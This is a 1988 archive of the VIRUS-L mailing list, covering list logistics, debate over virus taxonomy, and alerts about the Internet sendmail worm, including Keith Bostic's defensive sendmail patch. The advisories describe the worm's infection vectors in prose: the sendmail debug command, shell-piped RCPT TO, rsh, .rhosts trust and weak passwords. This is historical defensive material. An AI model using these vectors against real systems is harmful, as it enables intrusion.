home *** CD-ROM | disk | FTP | other *** search
/ 2,000 Greater & Lesser Mysteries / 2,000 Greater and Lesser Mysteries.iso / computer / virus / mys00493.txt < prev    next >
Encoding:
Text File  |  1994-06-10  |  191.4 KB  |  4,309 lines

  1. =========================================================================
  2. Date:         Tue, 1 Nov 88 13:22:19 EST
  3. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  4. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  5. From:         "Kenneth R. van Wyk" <LUKEN@LEHIIBM1>
  6. Subject:      Nov. 1, monthly information
  7.  
  8.  
  9. [ Last modified 01 November 88 - Ken van Wyk ]
  10.  
  11. Welcome!  This is the monthly introduction posting for VIRUS-L,
  12. primarily for the benefit of any newcomers.  Apologies to all
  13. subscribers who've already read this in the past (you'll only have to
  14. see it once a month and you can, if you're quick, press the purge
  15. key...:-).
  16.  
  17.  
  18. What is VIRUS-L?
  19.  
  20. It is an electronic mail discussion forum for sharing information
  21. about computer viruses.  Discussions should include (but not
  22. necessarily be limited to): current events (virus sightings), virus
  23. prevention (practical and theoretical), and virus questions/answers.
  24. The list is non-moderated and non-digested.  That means that any
  25. message coming in goes out immediately.  Weekly logs of submissions
  26. are kept for those people who prefer digest format lists (see below
  27. for details on how to get them).   For those interested in statistics,
  28. VIRUS-L is now (Nov. 1, 1988) up to 514 direct subscribers.  Of those,
  29. approximately 50 are local redistribution accounts with an unknown
  30. number of readers.
  31.  
  32.  
  33. What isn't VIRUS-L?
  34.  
  35. A place to spread hype about computer viruses; we already have the
  36. Press for that.  :-)  A place to sell things, to panhandle, or to
  37. flame other subscribers.  If anyone *REALLY* feels the need to flame
  38. someone else for something that they may have said, then the flame
  39. should be sent directly to that person and/or to the list moderator
  40. (that'd be me, <LUKEN@LEHIIBM1.BITNET>).
  41.  
  42.  
  43. How do I get on the mailing list?
  44.  
  45. Well, if you're reading this, chances are *real good* that you're
  46. already on the list.  However, perhaps this document was given to you
  47. by a friend or colleague...  So, to get onto the VIRUS-L mailing list,
  48. send a mail message to <LISTSERV@LEHIIBM1.BITNET>.  In the body of the
  49. message, say nothing more than SUB VIRUS-L your name.  LISTSERV is a
  50. program which automates mailing lists such as VIRUS-L.  As long as
  51. you're either on BITNET, or any network accessible to BITNET via
  52. gateway, this should work.  Within a short time, you will be placed on
  53. the mailing list, and you will get confirmation via e-mail.
  54.  
  55.  
  56. How do I get OFF of the list?
  57.  
  58. If, in the unlikely event, you should happen to want to be removed from
  59. the VIRUS-L discussion list, just send mail to
  60. <LISTSERV@LEHIIBM1.BITNET> saying SIGNOFF VIRUS-L.  People, such as
  61. students, whose accounts are going to be closed (like over the
  62. summer...) - PLEASE signoff of the list before you leave.  Also, be
  63. sure to send your signoff request to the LISTSERV and not to the list
  64. itself.  Note that the appropriate node name is LEHIIBM1, not LEHIGH;
  65. we have a node called LEHIGH, but they are *NOT* one and the same.
  66.  
  67.  
  68. How do I send a message to the list?
  69.  
  70. Just send electronic mail to <VIRUS-L@LEHIIBM1.BITNET> and it will
  71. automatically be redistributed to everyone on the mailing list.  By
  72. default, you will NOT receive a copy of your own letters.  If you wish
  73. to, send mail to <LISTSERV@LEHIIBM1.BITNET> saying SET VIRUS-L REPRO
  74.  
  75.  
  76. I can't submit anything to the list - what's wrong?
  77.  
  78. There have been a few cases where people found that they were unable
  79. to send anything in to VIRUS-L even though they were registered
  80. subscribers (only subscribers can participate).  Let me try to explain.
  81. The LISTSERV program differentiates lowercase from UPPERCASE.  So,
  82. if you've subscribed to the list as (for example) OPUS@BLOOM.COUNTY.EDU
  83. and your mail is actually coming through as Opus@Bloom.County.EDU, then
  84. the LISTSERV will think that you're not subscribed to the list.
  85. BITNET usernames and node names are automatically uppercased by
  86. the LISTSERV, but other network addresses are not.  If your site
  87. (or you) should happen to make a change to, say, the system mailer
  88. such that it changes the case of your mail, there will be problems.
  89. If you're having problems submitting (you'll know this because
  90. the LISTSERV will say "Not authorized to send to VIRUS-L..."), try
  91. unsubscribing and re-subscribing.  If that doesn't work, send me
  92. mail (LUKEN@LEHIIBM1.BITNET), and I'll try to fix things up.
  93.  
  94.  
  95. What does VIRUS-L have to offer?
  96.  
  97. All submissions to VIRUS-L are stored in weekly log files which can be
  98. downloaded by any user on (or off) the mailing list; readers who prefer
  99. digest format lists should read only the weekly logs.  There is also a
  100. small archive of some of the public anti-virus programs which are
  101. currently available.  This archive, too, can be accessed by any user.
  102. All of this is handled automatically by the LISTSERV here at Lehigh
  103. University (<LISTSERV@LEHIIBM1.BITNET>).
  104.  
  105.  
  106. How do I get files from the LISTSERV?
  107.  
  108. Well, you'll first want to know what files are available on the
  109. LISTSERV.  To do this, send mail to <LISTSERV@LEHIIBM1.BITNET> saying
  110. INDEX VIRUS-L.  Note that filenames/extensions are separated by a
  111. space, and not by a period.  Once you've decided which file(s) you
  112. want, send mail to <LISTSERV@LEHIIBM1.BITNET> saying GET filename
  113. filetype.  For example, GET VIRUS-L LOG8804 would get the file called
  114. VIRUS-L LOG8804 (which happens to be the monthly log of all messages
  115. sent to VIRUS-L during April, 1988).  Note that, starting June 6, 1988,
  116. the logs are weekly.  The new file format is VIRUS-L LOGyymmx where
  117. yy is the year (88, 89, etc.), mm is the month, and x is the week
  118. (A, B, etc.).  Readers who prefer digest format lists should read
  119. the weekly logs and sign off of the list itself.  Subsequent submissions
  120. to the list should be sent to me for forwarding.
  121.  
  122. Also available is a LISTSERV at SCFVM which contains more anti-virus
  123. software.  This LISTSERV can be accessed in the same manner as outlined
  124. above, with the exceptions that the address is <LISTSERV@SCFVM.BITNET>
  125. and that the commands to use are INDEX PUBLIC and GET filename filetype
  126. PUBLIC.
  127.  
  128.  
  129. What is uuencode/uudecode, and why do I need them?
  130.  
  131. Uuencode and uudecode are two programs which convert binary files into
  132. text (ASCII) files and back again.  This is so binary files can be
  133. easily transferred via electronic mail.  Many of the files on this
  134. LISTSERV are binary files which are stored in uuencoded format (the
  135. file types will be UUE).  Both uuencode and uudecode are available from
  136. the LISTSERV.  Uudecode is available in BASIC and in Turbo Pascal here.
  137. Uuencode is available in Turbo Pascal.  Also, there is a very good
  138. binary-only uuencode/uudecode package on the LISTSERV which is stored
  139. in uuencoded format.
  140.  
  141.  
  142. Why have posting guidelines?
  143.  
  144. To keep the discussions on-track with what the list is intended to be;
  145. a vehicle for virus discussions.  This will keep the network traffic
  146. to a minimum and, hopefully, the quality of the content of the mail to
  147. a maximum.  No one wants to read personal flames ad nausium, or
  148. discussions about the pros and cons of digest-format mailing lists,
  149. etc.  Your adherence to these guidelines is appreciated, and essential
  150. in keeping the list a non-moderated one.
  151.  
  152.  
  153.  
  154. What are the guidelines?
  155.  
  156.      As already stated, there will be no flames on the list.  Anyone
  157.      sending flames to the entire list must do so knowing that he/she
  158.      will be removed from the list immediately.
  159.  
  160.      Same goes for any commercial plugs or panhandling.
  161.  
  162.      Submissions should be directly or indirectly related to the
  163.      subject of computer viruses.  This one is particularly important,
  164.      other subscribers really don't want to read about things that
  165.      aren't relevant - it only adds to network traffic and frustration
  166.      for the people reading the list.
  167.  
  168.      Responses to queries should be sent to the author of the query,
  169.      not to the entire list.  The author should then send a summary
  170.      of his/her responses to the list at a later date.
  171.  
  172.      "Automatic answering machine" programs (the ones which reply
  173.      to e-mail for you when you're gone) should be set to *NOT*
  174.      reply to VIRUS-L.  Such responses sent to the entire list
  175.      are very rude and will be treated as such.
  176.  
  177.      When sending in a submission, try to see whether or not someone
  178.      else may have just said the same thing.  This is particularly
  179.      important when responding to someone else's posting (which should
  180.      be sent to that person *anyway*).  It's very easy to get multiple
  181.      messages saying the exact same thing.  No one wants this to
  182.      happen.
  183.  
  184. Thank-you for your time and for your adherence to these guidelines.
  185. Comments and suggestions, as always, are invited.  Please address them
  186. to me, <LUKEN@LEHIIBM1.BITNET> or <luken@Spot.CC.Lehigh.EDU>.
  187.  
  188.  
  189.  
  190. Ken van Wyk
  191.  
  192. Kenneth R. van Wyk                   Calvin: (hammer hammer hammer ...)
  193. User Services Senior Consultant      Mom: Calvin, what are you DOING to the
  194. Lehigh University Computing Center        coffee table?!
  195. Internet: <luken@Spot.CC.Lehigh.EDU> Calvin: Is this some sort of trick
  196. BITNET:   <LUKEN@LEHIIBM1>                question?
  197. =========================================================================
  198. Date:         Tue, 1 Nov 88 10:11:45 EST
  199. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  200. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  201. From:         SHERK@UMDD
  202. Subject:      Re: Debrain.exe
  203. In-Reply-To:  Message received on Mon, 31 Oct 88  18:45:34 EST
  204.  
  205. >From:         Wim Bonner <27313853@WSUVM1>
  206.  
  207. >If possible, when people post where code is available via FTP, could
  208. >you also list the network numbers?  I am interested in getting the brain
  209. >code, but Our machine which can do FTP does not have a full listing of
  210. >hosts.  I can call out if I know the number though.
  211. The internet address of umd5.umd.edu is 128.8.10.5 but I think this is a
  212. problem you should take up with you system administrator. Any machine that
  213. can FTP can also find an internet address from a fully qualified domain
  214. name.
  215.  
  216. Erik Sherk
  217. Workstation Programmer
  218. Computer Science Center
  219. University of Maryland
  220. sherk@umd5.umd.edu
  221. =========================================================================
  222. Date:         Tue, 1 Nov 88 11:10:44 est
  223. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  224. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  225. From:         GATEH@CONNCOLL
  226. Subject:      Macs and VirusRx
  227.  
  228.  
  229. >        This afternoon, I found that we have what I think is some form
  230. >of mutated virus.  IT CHANGED MY VIRUS RX PROGRAM TO A GENERIC DOCUMENT
  231. >ENTITLED "PLEASE THROW ME IN THE TRASH".  This is no joke.  It did it right
  232. >in front of my eyes.
  233. >I got a message box, which stated "There is a penetration attempt
  234. >on VirusRx, if the disc is unlocked, it will be changed
  235. >to "Please throw me in the trash"".
  236.  
  237.         As I understand it, this is a feature of VirusRx.  If the
  238. application is run on a machine with an infected system (as opposed to
  239. running it from a locked floppy w/clean system), and the system infects
  240. VirusRx, the application destroys itself.  This is to make sure that the
  241. virus is not spread further via contaminated copies of VirusRx.
  242.  
  243.  
  244. Gregg TeHennepe                        | BITNET:  gateh@conncoll
  245. Minicomputer Specialist                | Phone:   (203) 447-7681
  246. Academic Computing and User Services
  247. Connecticut College
  248. New London, CT   06320
  249. =========================================================================
  250. Date:         Tue, 1 Nov 88 17:25:25 AST
  251. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  252. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  253. Comments:     <Sent by MUSIC/SP mailer at UNB.CA>
  254. From:         CHRIS JONES <M61G@UNB.CA>
  255. In-Reply-To:  In reply to your message of TUE 01 NOV 1988 14:47:02 EDT
  256.  
  257. I'M A LITTLE AT A LOSS TO UNDERSTAND YOUR LETTER.  I HAVE NO IDEA
  258. WHAT DISSERTATION COPY YOU HAVE IN MIND, AND I DON'T REMEMBER SENDING
  259. ANYWHERE FOR ONE.  SORRY I CAN'T HELP.  (MAYBE YOU HAVE THE ADDRESS?)
  260. CHRIS JONES
  261. (M616000@UNB.CA)
  262. =========================================================================
  263. Date:         Wed, 2 Nov 88 06:28:24 PST
  264. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  265. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  266. From:         Robert Slade <USERCE57@UBCMTSG>
  267. Subject:      Anybody home?
  268.  
  269. I've very suddenly stopped getting VIRUS-L.
  270. =========================================================================
  271. Date:         Wed, 2 Nov 88 13:27:44 EST
  272. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  273. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  274. From:         "Steven C. Woronick" <XRAYSROK@SBCCVM>
  275. Subject:      Re: Anybody home?
  276.  
  277.  
  278.    I've not been getting much virus-l mail either.  I figure that either
  279. (1) the listserver is ill or (2) my mail is getting intercepted somewhere
  280. or (3) everybody's afraid to talk for fear of being flamed for writing
  281. about issues on the fringe of virus-l's set of pre-approved topics (like
  282. all the flak about ethics in computer crime and punishment).
  283. =========================================================================
  284. Date:         Wed, 2 Nov 88 14:58:21 EST
  285. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  286. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  287. From:         Ken van Wyk <luken@SPOT.CC.LEHIGH.EDU>
  288. Subject:      network traffic and comments on EEV vs FEV
  289.  
  290.  
  291. First, VIRUS-L is alive and well.  Traffic has just been low lately,
  292. that is all.
  293.  
  294. Re: Len Levine's suggestion:
  295.  
  296. > Let me suggest a couple of definitions.
  297. > ...two kinds of virii, those that exploit errors (Error Exploiting
  298. > Virii or EEV) and those that exploit system features (Feature
  299. > Exploiting Virii or FEV).
  300.  
  301. I should think that such a naming convention could be pretty useful
  302. whereby an EEV would be attributable to (presumably) a system programming
  303. error, and an FEV would be attributable to a system design deficiency.
  304.  
  305. I'd also think that EEVs would be more prevalent on micros since there
  306. is no facility for memory protection, etc.  Of course, this is an
  307. opinion...  To the "garden variety" virus author, technical
  308. specifications for micros are much easier to find than the same for
  309. mainframes; hence writing an EEV to exploit some non-protected
  310. facility (e.g., writing an absolute sector to disk) would be easier
  311. than doing the same on a mainframe.  What's more, direct i/o
  312. instructions on most mainframes are privileged instructions and
  313. wouldn't be available to an average user program.  More frequently, a
  314. mainframe virus would take advantage of something like file sharing in
  315. order to infect other users' file spaces.
  316.  
  317. Comments?
  318.  
  319. Ken
  320.  
  321.  
  322. Kenneth R. van Wyk                   Calvin: (hammer hammer hammer ...)
  323. User Services Senior Consultant      Mom: Calvin, what are you DOING to the
  324. Lehigh University Computing Center        coffee table?!
  325. Internet: <luken@Spot.CC.Lehigh.EDU> Calvin: Is this some sort of trick
  326. BITNET:   <LUKEN@LEHIIBM1>                question?
  327. =========================================================================
  328. Date:         Wed, 2 Nov 88 20:36:00 PST
  329. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  330. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  331. From:         "JOHN D. WATKINS" <WATKINS@UCRVMS>
  332. Subject:      I'm hit!  I'm hit!
  333.  
  334.   Just in case anybody cares (studying the spread of these things), UCR
  335. (that's R as in Riverside, CA; near LA) has been hit by nvir.  Actually,
  336. we first saw it here a couple of months ago, but we thought we stamped
  337. out the (theoretically) small infection.  Well, like they say, tyey're
  338. back...
  339.  
  340.    Kevin Lund
  341.  
  342. =========================================================================
  343. Date:         Thu, 3 Nov 88 00:37:00 EDT
  344. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  345. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  346. From:         X-=*REB*=-X <KREBAUM@VAX1.CC.LEHIGH.EDU>
  347. Subject:      WestWorld "virus"
  348.  
  349. This  evening, I saw  the movie WestWorld on HBO  or Cinemax.  I never
  350. thought of it before, but I guess the  robots were stuck with a virus.
  351. This movie was made in 1972. I guess  that that  was quite an advanced
  352. concept for its time.
  353.  
  354.  
  355.                                  REB
  356.       ___________________________________________________________
  357.      /  From: -=*REB*=- (In Pennsylvania until January...)      ",
  358.     /FoneNet:(0010 0001 0101)1000 0110 0111-1000 0100 0011 0011BCD",
  359.    /InterNet:kREBaum@Vax1.CC.Lehigh.EDU  BitNet: RB00@Lehigh.Bitnet",
  360.   / SlowNet: 508 E 4th St (positively) Suite #1, Bethlehem, PA 18015",
  361.  /NJ E-Mail: UUCP: Will this system EVER be up? Only the Shadow knows",
  362. /NJ Slownet: 861 Washington Avenue Westwood, NJ 07675  (201)-666-9207 ",
  363. !----------------------------------------------------------------------!
  364. !             Garcia & Lesh in '88 - Might As Well Party!              !
  365. "----------------------------------------------------------------------"
  366. =========================================================================
  367. Date:         Thu, 3 Nov 88 09:05:27 EST
  368. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  369. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  370. From:         Ken van Wyk <luken@SPOT.CC.LEHIGH.EDU>
  371. Subject:      Internet virus
  372.  
  373.  
  374. The following is a (typed in) reprint of a submission to the TCPIP-L mailing
  375. list:
  376.  
  377.  
  378. Date:    Wed, 2 Nov 88 23:28:00 PST
  379. From:    "Peter E. Yee" <yee@AMES.ARC.NASA.GOV>
  380. Subject: Internet VIRUS alert
  381.  
  382. We are currently under attack from an Internet VIRUS.  It has hit UC
  383. Berkeley, UC San Diego, Lawrence Livermore, Stanford, and NASA Ames.
  384. The virus comes in via SMTP (ed. Simple Mail Transfer Protocol is the
  385. mail protocol used by the TCP/IP based Internet, which includes
  386. ARPAnet, MILNET, and a whole slew of others all over the world), and
  387. then is able to attack all 4.3BSD and SUN (3.X?) machines.  It sends a
  388. RCPT TO that requests that its data be piped through a shell.  It
  389. copies in a program, compiles and executes it.  This program copies in
  390. VAX and SUN binaries that try to replicate the virus via connections
  391. to TELNETD, FTPD, FINGERD, RSHD, and SMTP (ed. these are the standard
  392. background tasks, or daemons, that run on TCP/IP equipped machines;
  393. the tasks performed by them include remote login sessions, file
  394. transfer sessions, etc.).  The programs also appear to have DES tables
  395. in them.  They appear in /usr/tmp as files that start with the letter
  396. x.   Removing them is not enough as they will come back in the next
  397. wave of attacks.  For now, turning off the above services seems to be
  398. the only help.  The virus is able to take advantage of .rhosts files
  399. and hosts.equiv.  We are not certain what the final result of the
  400. binaries is, hence the warning.
  401.  
  402. I can be contacted at (415) 642-7447.  Phil Lapsley and Kurt Pires at
  403. this number are also conversant with the virus.
  404.  
  405.                 -Peter Yee
  406.                 yee@ames.arc.nasa.gov
  407.                 ames!yee
  408.  
  409.  
  410.  
  411. Ken
  412.  
  413.  
  414.  
  415. Kenneth R. van Wyk                   Calvin: (hammer hammer hammer ...)
  416. User Services Senior Consultant      Mom: Calvin, what are you DOING to the
  417. Lehigh University Computing Center        coffee table?!
  418. Internet: <luken@Spot.CC.Lehigh.EDU> Calvin: Is this some sort of trick
  419. BITNET:   <LUKEN@LEHIIBM1>                question?
  420. =========================================================================
  421. Date:         Thu, 3 Nov 88 09:40:18 EST
  422. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  423. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  424. From:         "David M. Chess" <CHESS@YKTVMV>
  425. Subject:      comments on EEV vs FEV
  426.  
  427. Ken suggests:
  428. > I should think that such a naming convention could be pretty useful
  429. > whereby an EEV would be attributable to (presumably) a system programming
  430. > error, and an FEV would be attributable to a system design deficiency.
  431.  
  432. I don't know how practical that would really prove.   The archetypal
  433. virus needs only the following abilities:
  434.  1) Find out the names of some executable files on the system
  435.  2) Read an executable file
  436.  3) Alter an executable file
  437.  
  438. Which of those three abilities deserves to be called a design
  439. deficiency?   Systems without (1) or (2) are rather crippled from
  440. a number of viewpoints, and it's tough to write a complier for
  441. a system without (3).
  442.  
  443. I think we have to face the fact that viruses can spread even in
  444. a correctly-functioning system without design deficiencies.  What
  445. we have to do is figure out what to add to such a system to try
  446. to minimize the danger of a virus spreading undetected.   I guess
  447. "doesn't have a good virus-protection system" might count as a
  448. design deficiency, but if so, every existing general-purpose system
  449. counts as deficient...       *8)
  450.  
  451. DC
  452.  
  453. P.S. I'm not really disagreeing with Ken, of course; I'm just using
  454.      his paragraph as an excuse to toot the usual horn...
  455. =========================================================================
  456. Date:         Thu, 3 Nov 88 10:02:04 EST
  457. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  458. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  459. From:         Ken van Wyk <luken@SPOT.CC.LEHIGH.EDU>
  460. Subject:      Re: comments on EEV vs FEV
  461. In-Reply-To:  Your message of Thu, 3 Nov 88 09:40:18 EST
  462.  
  463. > I don't know how practical that would really prove.   The archetypal
  464. > virus needs only the following abilities:
  465. >  1) Find out the names of some executable files on the system
  466. >  2) Read an executable file
  467. >  3) Alter an executable file
  468. > Which of those three abilities deserves to be called a design
  469. > deficiency?   Systems without (1) or (2) are rather crippled from
  470. > a number of viewpoints, and it's tough to write a complier for
  471. > a system without (3).
  472.  
  473. Well yes, any system needs to be able to do all those things, but they
  474. still ought to be limited.  The problem isn't that executables need to
  475. be altered, but who should be allowed to alter them.  Compilers and
  476. linkers, of course, should be able to alter executables.  Directory
  477. listing programs, however, have no business altering executables.
  478. Therein lies (what I believe to be) a design deficiency.  If a system
  479. allows a user to alter any of his/her own files from within any
  480. program that he/she can legally execute, isn't that a design
  481. deficiency of the operating system itself?  There are privileged
  482. instructions to do things like terminal i/o - shouldn't file
  483. modification be scrutinized more closely as well?  In a system where
  484. only compilers/linkers can alter executables, and the compilers
  485. themselves are in execute-only system filespace maintained by systems
  486. personnel, the chances of a FEV (Feature Exploiting virus) spreading
  487. would be greatly reduced.
  488.  
  489. > I guess
  490. > "doesn't have a good virus-protection system" might count as a
  491. > design deficiency, but if so, every existing general-purpose system
  492. > counts as deficient...
  493.  
  494. True.  Perhaps then, existing operating systems ought to be changed?
  495.  
  496.  
  497. Ken
  498.  
  499.  
  500. > P.S. I'm not really disagreeing with Ken, of course; I'm just using
  501. >      his paragraph as an excuse to toot the usual horn...
  502.  
  503. P.S. I'm not really disagreeing with David, of course; I'm just using
  504.      his paragraph as an excuse to toot the usual horn...  :-)
  505.  
  506.  
  507.  
  508. Kenneth R. van Wyk                   Calvin: (hammer hammer hammer ...)
  509. User Services Senior Consultant      Mom: Calvin, what are you DOING to the
  510. Lehigh University Computing Center        coffee table?!
  511. Internet: <luken@Spot.CC.Lehigh.EDU> Calvin: Is this some sort of trick
  512. BITNET:   <LUKEN@LEHIIBM1>                question?
  513. =========================================================================
  514. Date:         Thu, 3 Nov 88 11:48:45 EST
  515. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  516. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  517. From:         "Kenneth R. van Wyk" <LUKEN@LEHIIBM1>
  518. Subject:      More information on Internet virus described earlier
  519.  
  520.  
  521.      Just got some more info on that Internet virus.  I'm currently checking
  522.      the newsgroup (see below) for the fix.  If/when I find it, I'll post
  523.      it here.
  524.  
  525.      Ken
  526.  
  527.  
  528. Date:         Thu, 3 Nov 88 10:11:37 EST
  529. Sender:       Network Site Liaisons <LIAISON@RUTVM1>
  530. From:         Ross Patterson <A024012@RUTVM1>
  531. Subject:      Unix virus, beware
  532. To:           "Kenneth R. Van Wyk" <LUKEN@LEHIIBM1>
  533.  
  534.     Just  a brief  note to  warn  system managers  of 4.xBSD  systems,
  535. particularly Suns  and VAXen, that there  is a virus in  the air.  The
  536. fix has been posted  to NetNews newsgroup "comp.sys.4bsd.ucb-fixes" by
  537. Keith Bostick, UC  Berkeley.  For your system to be  affected, it must
  538. be running TCP/IP.  The virus  propagates via mail (using the SENDMAIL
  539. daemon) and  RSH.  We're stomping  it out  here at Rutgers,  using the
  540. Bostick's suggestions.  Happy hunting.
  541.  
  542. Ross Patterson
  543. Rutgers University
  544. Center for Computer and Information Services
  545. Systems Programming
  546. =========================================================================
  547. Date:         Thu, 3 Nov 88 14:16:05 EST
  548. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  549. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  550. From:         "David A. Bader" <DAB3@LEHIGH>
  551. Subject:      CHECKUP v1.8
  552.  
  553. I just received a copy of CHECKUP 1.8   Has anyone else used this
  554. version? Any differences from version 1.4??  The author includes
  555. a very large and informative text file on anti-viral, anti-trojan horse
  556. concerns and applications.
  557.    -David Bader
  558.    DAB3@LEHIGH
  559. =========================================================================
  560. Date:         Thu, 3 Nov 88 14:26:00 EST
  561. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  562. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  563. From:         Jim Shaffer <SHAFFERJ@BKNLVMS>
  564. Subject:      diversity of systems (WARNING: MILD FLAME)
  565.  
  566. For the nth time, would everyone out there try to remember that there
  567. are computer systems out there besides IBM (both mainframes and PCs)?
  568.  
  569. Although I can usually tell what system someone is talking about by
  570. reading the message, there are times when it takes a while.
  571. Furthermore, there have got to be people who haven't been around computers
  572. long enough to tell what certain terms mean, who will be completely
  573. mystified by a reference to a system they've never used.  It certainly
  574. took *me* long enough to get a clue to what the h--- all the VM/CMS people
  575. were talking about, having used only Unix and VMS myself.
  576.  
  577. Jim
  578.  
  579. PS:  The references to IBM were only stating the facts.  I'm *NOT* trying
  580. to start a holy war here!
  581. =========================================================================
  582. Date:         Thu, 3 Nov 88 13:01:00 CST
  583. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  584. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  585. From:         Kevin Trojanowski <troj@UMAXC.WEEG.UIOWA.EDU>
  586.  
  587. Subject:  EEVs on micros
  588.  
  589. > I'd also think that EEVs would be more prevalent on micros since there
  590. > is no facility for memory protection, etc.  Of course, this is an
  591. > opinion...  To the "garden variety" virus author, technical
  592. > specifications for micros are much easier to find than the same for
  593. > mainframes; hence writing an EEV to exploit some non-protected
  594. > facility (e.g., writing an absolute sector to disk) would be easier
  595. > than doing the same on a mainframe.  What's more, direct i/o
  596. > instructions on most mainframes are privileged instructions and
  597. > wouldn't be available to an average user program.  More frequently, a
  598. > mainframe virus would take advantage of something like file sharing in
  599. > order to infect other users' file spaces.
  600.  
  601. If I'm not mistaken (it's been a while since I read the article), but OS/2
  602. provides such protection, on top of providing the basework needed to
  603. support virtual memory.
  604.  
  605. Associated with the memory of the 80286 and 80386 running OS/2 is a series
  606. of access bits for each process; this preventing the user programs from
  607. accessing the kernal, and also preventing them from accessing directly the
  608. memory locations needed to deal directly with the hardware.
  609.  
  610. -Kevin Trojanowski
  611. troj@umaxc.weeg.uiowa.edu
  612. =========================================================================
  613. Date:         Thu, 3 Nov 88 17:11:41 EST
  614. Reply-To:     Virus Discussion List <VIRUS-L@LEHIIBM1>
  615. Sender:       Virus Discussion List <VIRUS-L@LEHIIBM1>
  616. From:         msmith@TOPAZ.RUTGERS.EDU
  617. Subject:      INTERNET SENDMAIL VIRUS!!!
  618.  
  619. These are two articles pulled off of news.announce.important on UseNet:
  620. ---------------------------------
  621. From bostic@okeeffe.Berkeley.EDU (Keith Bostic) Thu Nov  3 05:58:55 1988
  622. Path: topaz.rutgers.edu!aramis.rutgers.edu!njin!rutgers!mailrus!purdue!bostic@ok
  623.    eeffe.Berkeley.EDU
  624. From: bostic@okeeffe.Berkeley.EDU (Keith Bostic)
  625. Newsgroups: news.announce.important,news.sysadmin
  626. Subject: Virus (READ THIS IMMEDIATELY)
  627. Message-ID: <5309@medusa.cs.purdue.edu>
  628. Date: 3 Nov 88 10:58:55 GMT
  629. Sender: news@cs.purdue.EDU
  630. Followup-To: news.sysadmin
  631. Lines: 109
  632. Approved: news@cs.purdue.EDU
  633. Xref: topaz.rutgers.edu news.announce.important:21 news.sysadmin:1282
  634.  
  635.  
  636. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  637. Subject: Fixes for the virus
  638. Index: usr.lib/sendmail/src/srvrsmtp.c 4BSD
  639.  
  640. Description:
  641.         There's a virus running around; the salient facts.  A bug in
  642.         sendmail has been used to introduce a virus into a lot of
  643.         Internet UNIX systems.  It has not been observed to damage the
  644.         host system, however, it's incredibly virulent, attempting to
  645.         introduce itself to every system it can find.  It appears to
  646.         use rsh, broken passwords, and sendmail to introduce itself
  647.         into the target systems.  It affects only VAXen and Suns, as
  648.         far as we know.
  649.  
  650.         There are three changes that we believe will immunize your
  651.         system.  They are attached.
  652.  
  653.         Thanks to the Experimental Computing Facility, Center for
  654.         Disease Control for their assistance.  (It's pretty late,
  655.         and they certainly deserved some thanks, somewhere!)
  656.  
  657. Fix:
  658.         First, either recompile or patch sendmail to disallow the `debug'
  659.         option.  If you have source, recompile sendmail after first
  660.         applying the following patch to the module svrsmtp.c:
  661.  
  662.                 *** /tmp/d22039 Thu Nov  3 02:26:20 1988
  663.                 --- srvrsmtp.c  Thu Nov  3 01:21:04 1988
  664.                 ***************
  665.                 *** 85,92 ****
  666.                         "onex",         CMDONEX,
  667.                   # ifdef DEBUG
  668.                         "showq",        CMDDBGQSHOW,
  669.                 -       "debug",        CMDDBGDEBUG,
  670.                   # endif DEBUG
  671.                   # ifdef WIZ
  672.                         "kill",         CMDDBGKILL,
  673.                   # endif WIZ
  674.                 --- 85,94 ----
  675.                         "onex",         CMDONEX,
  676.                   # ifdef DEBUG
  677.                         "showq",        CMDDBGQSHOW,
  678.                   # endif DEBUG
  679.                 + # ifdef notdef
  680.                 +       "debug",        CMDDBGDEBUG,
  681.                 + # endif notdef
  682.                   # ifdef WIZ
  683.                         "kill",         CMDDBGKILL,
  684.                   # endif WIZ
  685.  
  686.         Then, reinstall sendmail, refreeze the configuration file,
  687.         using the command "/usr/lib/sendmail -bz", kill any running
  688.         sendmail's, using the ps(1) command and the kill(1) command,
  689.         and restart your sendmail.  To find out how sendmail is
  690.         execed on your system, use grep(1) to find the sendmail start
  691.         line in either the files /etc/rc or /etc/rc.local
  692.  
  693.         If you don't have source, apply the following patch to your
  694.         sendmail binary.  SAVE A COPY OF IT FIRST, IN CASE YOU MESS
  695.         UP!  This is mildly tricky -- note, some versions of strings(1),
  696.         which we're going to use to find the offset of the string
  697.         "debug" in the binary print out the offsets in octal, not
  698.         decimal.  Run the following shell line to decide how your
  699.         version of strings(1) works:
  700.  
  701.                 /bin/echo 'abcd' | /usr/ucb/strings -o
  702.  
  703.         Note, make sure the eight control 'G's are preserved in this
  704.         line.  If this command results in something like:
  705.  
  706.                 0000008 abcd
  707.  
